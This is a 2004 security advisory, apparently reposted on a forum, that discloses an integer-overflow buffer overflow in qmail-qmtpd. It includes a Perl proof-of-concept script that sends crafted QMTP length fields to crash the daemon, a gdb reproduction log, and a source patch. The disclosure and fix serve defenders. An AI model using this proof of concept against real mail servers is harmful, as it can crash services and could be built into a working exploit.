Georgi Guninski security advisory #67, 2004
Buffer overflow in qmail-qmtpd, yet still qmail much better than windows
Systems affected:
tested on qmail 1.03 on linux
Risk: Low - not in default install and i can't exploit it
Date: 3 March 2004
Legal Notice:
This Advisory is Copyright (c) 2004 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission - this especially applies to
so called "vulnerabilities databases" and securityfocus, microsoft, cert
and mitre.
If you want to link to this content use the URL:
[You must be registered and logged in to see this link.]Anything in this document may change without notice.
Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.
Description:
there is a buffer overflow in qmail-qmtpd.c if the env. var. RELAYCLIENT
is long between 4 and 1003. A static buffer gets overflowed due to integer
overflow. I can't exploit it on linux, though it may turn exploitable.
Details:
Basically the idea is it is possible getlen() to return (unsigned long)-1
or -4 and then the check
if (len + relayclientlen >= 1000)
passes though len == (unsigned)-4.
Then len is used to copy in a static buffer.
The check for len is *before* len is updated, so it is possible to
update len and then return len.
A lot of memory gets overwritten including qq. if a C compiler sets ssin
after buf, i believe it will be exploitable.
The trick is that
len = 10 * len + (ch - '0');
can return -1 if len == 0 and ch == '/'
How to reproduce:
--------------------------------------------------
[joro@sivokote tmp]$ ./qma-qmtpd.pl
qmail-qmtpd buffer overflow. Copyright Georgi Guninski
Cannot be used in vulnerability databases and similar stuff
<in another terminal>
ps awx
2080 pts/9 S 0:00 /var/qmail/bin/qmail-qmtpd
gdb attach 2080
cont
<in first terminal hit enter>
Program received signal SIGSEGV, Segmentation fault.
0x0804b096 in alarm ()
--------------------------------------------------
-qma-qmtpd.pl----
#!/usr/bin/perl -w
#Copyright Georgi Guninski\nCannot be used in vulnerability databases and
#similar stuff
use IO::Socket;
use IO::Poll;
$ENV{"RELAYCLIENT"}="M\$UX";
open(SOCK,"|/var/qmail/bin/qmail-qmtpd");
my $req;
my $fromaddr="they\@m\$.weenies";
my $touser="postmaster";
print "qmail-qmtpd buffer overflow. Copyright Georgi Guninski\n
Cannot be used in vulnerability databases and similar stuff\n";
$req = "1:\n,";
$req .= "1:V,";
$req .= "/:"; #biglen - this is how we code '-1'
$req .= ",:"; #len - this is how we code '-4'
print SOCK $req;
my $ch=getc();
$req = "v" x 100000;
print SOCK $req;
close SOCK;
-----------------
Fix:
Patch by me, use at your own risk:
-patch-----
--- ../qmail-1.03/qmail-qmtpd.c 1998-06-15 13:53:16.000000000 +0300
+++ qmail-qmtpd.c 2004-02-29 16:15:13.000000000 +0200
@@ -45,8 +45,8 @@
for (;;) {
substdio_get(&ssin,&ch,1);
if (ch == ':') return len;
- if (len > 200000000) resources();
len = 10 * len + (ch - '0');
+ if (len > 200000000 || ch < '0' || ch > '9') resources();
}
}
@@ -193,8 +193,8 @@
substdio_get(&ssin,&ch,1);
--biglen;
if (ch == ':') break;
- if (len > 200000000) resources();
len = 10 * len + (ch - '0');
+ if (len > 200000000 || ch < '0' || ch > '9') resources();
}
if (len >= biglen) badproto();
if (len + relayclientlen >= 1000) {
-----------
Vendor status:
djb is aware of the bug
Georgi Guninski
[You must be registered and logged in to see this link.]
Subyek: Buffer overflow in qmail-qmtpd 
Sun Jan 15, 2012 11:55 pm
